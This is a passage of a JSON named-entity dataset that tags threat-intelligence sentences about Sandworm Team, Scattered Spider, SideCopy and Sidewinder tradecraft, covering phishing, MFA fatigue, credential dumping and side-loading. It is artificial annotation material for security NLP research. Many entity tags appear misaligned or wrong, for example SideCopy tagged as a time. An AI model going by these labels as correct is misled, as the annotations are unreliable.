"O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "researched", "Ukraine's", "unique", "legal", "entity", "identifier", "(called", "an", "\"EDRPOU\"", "number),", "including", "running", "queries", "on", "the", "EDRPOU", "website,", "in", "preparation", "for", "the", "NotPetya", "attack.", "Sandworm", "Team", "has", "also", "researched", "third-party", "websites", "to", "help", "it", "craft", "credible", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "conducted", "research", "against", "potential", "victim", "websites", "as", "part", "of", "its", "operational", "planning." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "leased", "servers", "from", "resellers", "instead", "of", "leasing", "infrastructure", "directly", "from", "hosting", "companies", "to", "enable", "its", "operations." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "compromised", "legitimate", "Linux", "servers", "running", "the", "EXIM", "mail", "transfer", "agent", "for", "use", "in", "subsequent", "campaigns." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "Sandworm", "Team", "creates", "credential", "capture", "webpages", "to", "compromise", "existing,", "legitimate", "social", "media", "accounts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "I-Idus", "I-Idus", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "established", "social", "media", "accounts", "to", "disseminate", "victim", "internal-only", "documents", "and", "other", "sensitive", "data." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "researched", "software", "code", "to", "enable", "supply-chain", "operations,", "most", "notably", "for", "the", "2017", "NotPetya", "attack.", "Sandworm", "Team", "also", "collected", "a", "list", "of", "computers", "using", "specific", "software", "as", "part", "of", "its", "targeting", "efforts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "B-Org", "B-OffAct", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "the", "commercially", "available", "tool", "RemoteExec", "for", "agentless", "remote", "code", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "delivered", "malicious", "Microsoft", "Office", "attachments", "via", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "I-Way", "I-Way", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "crafted", "phishing", "emails", "containing", "malicious", "hyperlinks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "crafted", "spearphishing", "emails", "with", "hyperlinks", "designed", "to", "trick", "unwitting", "recipients", "into", "revealing", "their", "account", "credentials." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team's", "BCS-server", "tool", "uses", "base64", "encoding", "and", "HTML", "tags", "for", "the", "communication", "traffic", "between", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "used", "information", "stealer", "malware", "to", "collect", "browser", "session", "cookies." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "used", "a", "backdoor", "to", "enumerate", "information", "about", "the", "infected", "system's", "operating", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "had", "gathered", "user,", "IP", "address,", "and", "server", "data", "related", "to", "RDP", "sessions", "on", "a", "compromised", "host.", "It", "has", "also", "accessed", "network", "diagram", "files", "useful", "for", "understanding", "how", "a", "host's", "network", "was", "configured." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "collected", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "acquired", "open-source", "tools", "for", "their", "operations,", "including", "Invoke-PSImage,", "which", "was", "used", "to", "establish", "an", "encrypted", "channel", "from", "a", "compromised", "host", "to", "Sandworm", "Team's", "C2", "server", "in", "preparation", "for", "the", "2018", "Winter", "Olympics", "attack,", "as", "well", "as", "Impacket", "and", "RemoteExec,", "which", "were", "used", "in", "their", "2022", "Prestige", "operations." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Time", "B-OffAct", "B-Area", "B-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "dedicated", "network", "connections", "from", "one", "victim", "organization", "to", "gain", "unauthorized", "access", "to", "a", "separate", "organization." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "have", "used", "previously", "acquired", "legitimate", "credentials", "prior", "to", "attacks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "Sandworm", "Team", "has", "created", "VBScripts", "to", "run", "an", "SSH", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Tool" ] }, { "tokens": [ "In", "2017,", "Sandworm", "Team", "conducted", "technical", "research", "related", "to", "vulnerabilities", "associated", "with", "websites", "used", "by", "the", "Korean", "Sport", "and", "Olympic", "Committee,", "a", "Korean", "power", "company,", "and", "a", "Korean", "airport." ], "ner_tags": [ "O", "B-Time", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "B-Org", "O", "I-Org", "O", "O", "B-Area", "I-Org", "O", "O", "O", "B-Area", "B-Org" ] }, { "tokens": [ "Sandworm", "Team", "has", "scanned", "network", "infrastructure", "for", "vulnerabilities", "as", "part", "of", "its", "operational", "planning." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team's", "BCS-server", "tool", "connects", "to", "the", "designated", "C2", "server", "via", "HTTP." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "webshells", "including", "P.A.S.", "Webshell", "to", "maintain", "access", "to", "victim", "networks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "Impacket’s", "WMIexec", "module", "for", "remote", "code", "execution", "and", "VBScript", "to", "run", "WMI", "queries." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "Scarlet", "Mimic", "has", "used", "the", "left-to-right", "override", "character", "in", "self-extracting", "RAR", "archive", "spearphishing", "attachment", "file", "names." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "IAM", "manipulation", "to", "gain", "persistence", "and", "to", "assume", "or", "elevate", "privileges.", "Scattered", "Spider", "has", "also", "assigned", "user", "access", "admin", "roles", "in", "order", "to", "gain", "Tenant", "Root", "Group", "management", "permissions", "in", "Azure." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Way", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "retrieves", "browser", "histories", "via", "infostealer", "malware", "such", "as", "Raccoon", "Stealer." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Scattered", "Spider", "enumerates", "cloud", "environments", "to", "identify", "server", "and", "backup", "management", "infrastructure,", "resource", "access,", "databases", "and", "storage", "containers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "Scattered", "Spider", "abused", "AWS", "Systems", "Manager", "Inventory", "to", "identify", "targets", "on", "the", "compromised", "network", "prior", "to", "lateral", "movement." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "compromised", "Azure", "credentials", "for", "credential", "theft", "activity", "and", "lateral", "movement", "to", "on-premises", "systems.", "Scattered", "Spider", "has", "also", "leveraged", "pre-existing", "AWS", "EC2", "instances", "for", "lateral", "movement", "and", "data", "collection", "purposes." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "I-Way", "O", "B-Way", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Scattered", "Spider", "enumerates", "data", "stored", "within", "victim", "code", "repositories,", "such", "as", "internal", "GitHub", "repositories." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "used", "self-signed", "and", "stolen", "certificates", "originally", "issued", "to", "NVIDIA", "and", "Global", "Software", "LLC." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "added", "additional", "trusted", "locations", "to", "Azure", "AD", "conditional", "access", "policies." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "creates", "new", "user", "identities", "within", "the", "compromised", "organization." ], "ner_tags": [ "B-Idus", "B-HackOrg", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "access", "to", "the", "victim's", "Azure", "tenant", "to", "create", "Azure", "VMs.", "Scattered", "Spider", "has", "also", "created", "Amazon", "EC2", "instances", "within", "the", "victim's", "environment." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "Spider", "searches", "for", "credential", "storage", "documentation", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "used", "BlackCat", "ransomware", "to", "encrypt", "files", "on", "VMWare", "ESXi", "servers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Tool", "B-Tool" ] }, { "tokens": [ "Scattered", "Spider", "stages", "data", "in", "a", "centralized", "database", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "enumerates", "data", "stored", "in", "cloud", "resources", "for", "collection", "and", "exfiltration", "purposes." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "created", "volume", "shadow", "copies", "of", "virtual", "domain", "controller", "disks", "to", "extract", "the", "`NTDS.dit`", "file." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Scattered", "Spider", "leverages", "legitimate", "domain", "accounts", "to", "gain", "access", "to", "the", "target", "environment." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Tool", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "creates", "inbound", "rules", "on", "the", "compromised", "email", "accounts", "of", "security", "personnel", "to", "automatically", "delete", "emails", "from", "vendor", "security", "products." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "exfiltrated", "victim", "data", "to", "the", "MEGA", "file", "sharing", "site." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "deployed", "a", "malicious", "kernel", "driver", "through", "exploitation", "of", "CVE-2015-2291", "in", "the", "Intel", "Ethernet", "diagnostics", "driver", "for", "Windows", "(iqvw64.sys)." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "leveraged", "legitimate", "remote", "management", "tools", "to", "maintain", "persistent", "access." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "Spider", "enumerates", "a", "target", "organization", "for", "files", "and", "directories", "of", "interest,", "including", "source", "code." ], "ner_tags": [ "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "deployed", "ransomware", "on", "compromised", "hosts", "for", "financial", "gain." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "impersonated", "legitimate", "IT", "personnel", "in", "phone", "calls", "and", "text", "messages", "either", "to", "direct", "victims", "to", "a", "credential", "harvesting", "site", "or", "getting", "victims", "to", "run", "commercial", "remote", "monitoring", "and", "management", "(RMM)", "tools.", "Scattered", "Spider", "utilized", "social", "engineering", "to", "compel", "IT", "help", "desk", "personnel", "to", "reset", "passwords", "and", "MFA", "tokens." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Idus", "B-HackOrg", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "compromising", "user", "accounts,", "Scattered", "Spider", "registers", "their", "own", "MFA", "tokens." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "used", "multifactor", "authentication", "(MFA)", "fatigue", "by", "sending", "repeated", "MFA", "authentication", "requests", "to", "targets." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "extracted", "the", "`NTDS.dit`", "file", "by", "creating", "volume", "shadow", "copies", "of", "virtual", "domain", "controller", "disks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "used", "a", "combination", "of", "credential", "phishing", "and", "social", "engineering", "to", "capture", "one-time-password", "(OTP)", "codes." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "enumerate", "and", "exfiltrate", "code-signing", "certificates", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "directed", "victims", "to", "run", "remote", "monitoring", "and", "management", "(RMM)", "tools.", "In", "addition", "to", "directing", "victims", "to", "run", "remote", "software,", "Scattered", "Spider", "members", "themselves", "also", "deploy", "RMM", "software", "including", "AnyDesk,", "LogMeIn,", "and", "ConnectWise", "Control", "to", "establish", "persistence", "on", "the", "compromised", "network." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "can", "enumerate", "remote", "systems,", "such", "as", "VMware", "vCenter", "infrastructure." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "phone", "calls", "to", "instruct", "victims", "to", "navigate", "to", "credential-harvesting", "websites.", "Scattered", "Spider", "has", "also", "called", "employees", "at", "target", "organizations", "and", "compelled", "them", "to", "navigate", "to", "fake", "login", "portals", "using", "adversary-in-the-middle", "toolkits." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "retrieves", "browser", "cookies", "via", "Raccoon", "Stealer." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Scattered", "Spider", "adds", "a", "federated", "identity", "provider", "to", "the", "victim’s", "SSO", "tenant", "and", "activates", "automatic", "account", "linking." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scattered", "Spider", "has", "impersonated", "organization", "IT", "and", "helpdesk", "staff", "to", "instruct", "victims", "to", "execute", "commercial", "remote", "access", "tools", "to", "gain", "initial", "access." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Org", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "SideCopy", "has", "used", "a", "malicious", "loader", "DLL", "file", "to", "execute", "the", "`credwiz.exe`", "process", "and", "side-load", "the", "malicious", "payload", "`Duser.dll`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "SideCopy", "has", "compromised", "domains", "for", "some", "of", "their", "infrastructure,", "including", "for", "C2", "and", "staging", "malware." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "SideCopy", "has", "delivered", "trojanized", "executables", "via", "spearphishing", "emails", "that", "contacts", "actor-controlled", "servers", "to", "download", "malicious", "payloads." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "B-Purp", "B-Purp" ] }, { "tokens": [ "SideCopy", "has", "attempted", "to", "lure", "victims", "into", "clicking", "on", "malicious", "embedded", "archive", "files", "sent", "via", "spearphishing", "campaigns." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "SideCopy", "has", "used", "a", "legitimate", "DLL", "file", "name,", "`Duser.dll`", "to", "disguise", "a", "malicious", "remote", "access", "tool." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideCopy", "has", "utilized", "`mshta.exe`", "to", "execute", "a", "malicious", "hta", "file." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "SideCopy", "has", "executed", "malware", "by", "calling", "the", "API", "function", "`CreateProcessW`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideCopy", "uses", "a", "loader", "DLL", "file", "to", "collect", "AV", "product", "names", "from", "an", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideCopy", "has", "collected", "browser", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideCopy", "has", "sent", "spearphishing", "emails", "with", "malicious", "hta", "file", "attachments." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "I-Way", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "SideCopy", "has", "crafted", "generic", "lures", "for", "spam", "campaigns", "to", "collect", "emails", "and", "credentials", "for", "targeting", "efforts." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "B-Way", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "SideCopy", "has", "identified", "the", "OS", "version", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideCopy", "has", "identified", "the", "country", "location", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideCopy", "has", "identified", "the", "IP", "address", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideCopy", "has", "used", "compromised", "domains", "to", "host", "its", "malicious", "payloads." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideCopy", "has", "sent", "Microsoft", "Office", "Publisher", "documents", "to", "victims", "that", "have", "embedded", "malicious", "macros", "that", "execute", "an", "hta", "file", "via", "calling", "`mshta.exe`." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Sidewinder", "has", "used", "tools", "to", "automatically", "collect", "system", "and", "network", "configuration", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Sidewinder", "has", "configured", "tools", "to", "automatically", "send", "collected", "files", "to", "attacker", "controlled", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "base64", "encoding", "for", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "DLL", "side-loading", "to", "drop", "and", "execute", "malicious", "payloads", "including", "the", "hijacking", "of", "the", "legitimate", "Windows", "application", "file", "rekeywiz.exe." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Sidewinder", "has", "used", "the", "ActiveXObject", "utility", "to", "create", "OLE", "objects", "to", "obtain", "execution", "through", "Internet", "Explorer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "base64", "encoding", "and", "ECDH-P256", "encryption", "for", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-HackOrg", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "exploited", "vulnerabilities", "to", "gain", "execution", "including", "CVE-2017-11882", "and", "CVE-2020-0674." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Sidewinder", "has", "used", "malware", "to", "collect", "information", "on", "files", "and", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "LNK", "files", "to", "download", "remote", "files", "to", "the", "victim's", "network." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "JavaScript", "to", "drop", "and", "execute", "malware", "loaders." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "collected", "stolen", "files", "in", "a", "temporary", "folder", "in", "preparation", "for", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "lured", "targets", "to", "click", "on", "malicious", "files", "to", "gain", "execution", "in", "the", "target", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "lured", "targets", "to", "click", "on", "malicious", "links", "to", "gain", "execution", "in", "the", "target", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "named", "malicious", "files", "<code>rekeywiz.exe</code>", "to", "match", "the", "name", "of", "a", "legitimate", "Windows", "executable." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "I-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "<code>mshta.exe</code>", "to", "execute", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "PowerShell", "to", "drop", "and", "execute", "malware", "loaders." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "tools", "to", "identify", "running", "processes", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "added", "paths", "to", "executables", "in", "the", "Registry", "to", "establish", 